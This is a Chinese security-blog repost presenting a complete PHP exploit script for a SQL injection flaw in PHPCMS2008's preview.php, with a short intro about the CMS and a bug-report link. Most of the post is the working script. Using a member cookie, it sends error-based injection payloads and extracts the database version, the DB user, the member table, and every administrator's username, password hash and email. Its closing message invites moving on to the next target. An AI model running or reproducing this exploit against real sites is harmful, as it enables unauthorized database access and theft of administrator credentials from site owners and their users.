phpcms2008 preview.php 注入EXP

没穿底裤 2019年12月31日22:16:05评论364 views字数 442阅读1分28秒阅读模式
摘要

phpcms2008介绍Phpcms2008 是一款基于 PHP+Mysql 架构的网站内容管理系统,也是一个开源的 PHP 开发平台。Phpcms 采用模块化方式开发,功能易用便于扩展,可面向大中型站点提供重量级网站建设解决方案。3年来,凭借 Phpcms 团队长期积累的丰富的Web开发及数据库经验和勇于创新追求完美的设计理念,使得 Phpcms 得到了近10万网站的认可,并且越来越多地被应用到大中型商业网站。
最近帮朋友网站做一个测试,发现是phpcms2008的源码,乌云搜索了一下发现preview.php存在SQL注入漏洞,就折腾了个exp出来,加速注入速度。
此漏洞的详细介绍可以在这里找到的,见楼下链接:
http://www.wooyun.org/bugs/wooyun-2013-022112

phpcms2008介绍

Phpcms2008 是一款基于 PHP+Mysql 架构的网站内容管理系统,也是一个开源的 PHP 开发平台。Phpcms 采用模块化方式开发,功能易用便于扩展,可面向大中型站点提供重量级网站建设解决方案。3年来,凭借 Phpcms 团队长期积累的丰富的Web开发及数据库经验和勇于创新追求完美的设计理念,使得 Phpcms 得到了近10万网站的认可,并且越来越多地被应用到大中型商业网站。
最近帮朋友网站做一个测试,发现是phpcms2008的源码,乌云搜索了一下发现preview.php存在SQL注入漏洞,就折腾了个exp出来,加速注入速度。
此漏洞的详细介绍可以在这里找到的,见楼下链接:
http://www.wooyun.org/bugs/wooyun-2013-022112

phpcms2008 preview.php注入EXP

可能使用的时候要更改一下User-Agent,否则注入不成功。
注入前请先注册一个用户,把登陆后的cookie写入到cookie变量中。
[php]
/**
* Created by 独自等待
* Date: 13-11-24
* Time: 下午8:36
* Name: phpcms2008_preview.php
* 独自等待博客:http://www.waitalone.cn/
*/
print_r('
+------------------------------------------------------+
PHPCMS2008 preview.php 注入EXP
Site:http://www.waitalone.cn/
Exploit BY: 独自等待
Time:2013-11-24
+------------------------------------------------------+
');
if ($argc < 3) {
print_r('
+------------------------------------------------------+
Useage: php ' . $argv[0] . ' host path
Host: target server (ip/hostname)
Path: path of phpcms
Example: php ' . $argv[0] . ' localhost /phpcms
+------------------------------------------------------+
');
exit;
}
error_reporting(7);
//统计时间
$start_time = func_time();
$host = $argv[1];
$path = $argv[2];
$cookie = ''; //请把会员cookie写入此变量中
if ($cookie == '') exit('请注册会员后写入cookie到cookie变量中。');
if (preg_match('/MySQL Query/i', send_pack("'"))) {
//数据库版本
$db_ver = "'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#";
echo '数据库版本:' . get_info($db_ver) . "/n";
//数据库用户
$db_user = "'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#";
echo '数据库用户:' . get_info($db_user) . "/n";
//获取用户表
$db_member = "' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() and table_name like '%_member%' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#";
$member = get_info($db_member);
//获取管理员数量
$db_count = "' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,count(*),0x7e) FROM $member where groupid=1 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#";
$ad_count = get_info($db_count);
echo '管理员表中共有--[' . $ad_count . ']--个管理员' . "/n";
//显示注入数据
foreach (range(0, ($ad_count - 1)) as $i) {
$ad_pass = "' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,username,0x3a,password,0x3a,email,0x7e) FROM $member where groupid=1 LIMIT $i,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#";
echo '管理员[' . ($i + 1) . ']-->' . get_info($ad_pass) . "/n";
}
} else {
exit("报告大人,网站不存在此漏洞,你可以继续秒下一个!/n");
}

//提取返回信息
function get_info($info)
{
preg_match('/~(.*?)~1/i', send_pack($info), $match_string);
if (preg_match('/charset=utf-8/i', send_pack($info))) {
return iconv('utf-8', 'gbk//IGNORE', $match_string[1]);
} else {
return $match_string[1];
}
}

//发送数据包函数
function send_pack($cmd)
{
global $host, $path, $cookie;
$data = "GET " . $path . "/preview.php?info[catid]=15&content=a[page]b&info[contentid]=2" . urlencode($cmd) . " HTTP/1.1/r/n";
$data .= "Host: " . $host . "/r/n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0/r/n";
$data .= "Cookie:" . $cookie . "/r/n";
$data .= "Connection: Close/r/n/r/n";
//echo $data;
//这里一定要2个/r/n否则将会一直等待并且不返回数据
$fp = @fsockopen($host, 80, $errno, $errstr, 30);
//echo ini_get('default_socket_timeout');//默认超时时间为60秒
if (!$fp) {
echo $errno . '-->' . $errstr;
exit('Could not connect to: ' . $host);
} else {
fwrite($fp, $data);
$back = '';
while (!feof($fp)) {
$back .= fread($fp, 1024);
}
fclose($fp);
}
return $back;
}

//时间统计函数
function func_time()
{
list($microsec, $sec) = explode(' ', microtime());
return $microsec + $sec;
}

echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒。';
?> [/php]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日22:16:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   phpcms2008 preview.php 注入EXPhttps://cn-sec.com/archives/75295.html

发表评论

匿名网友 填写信息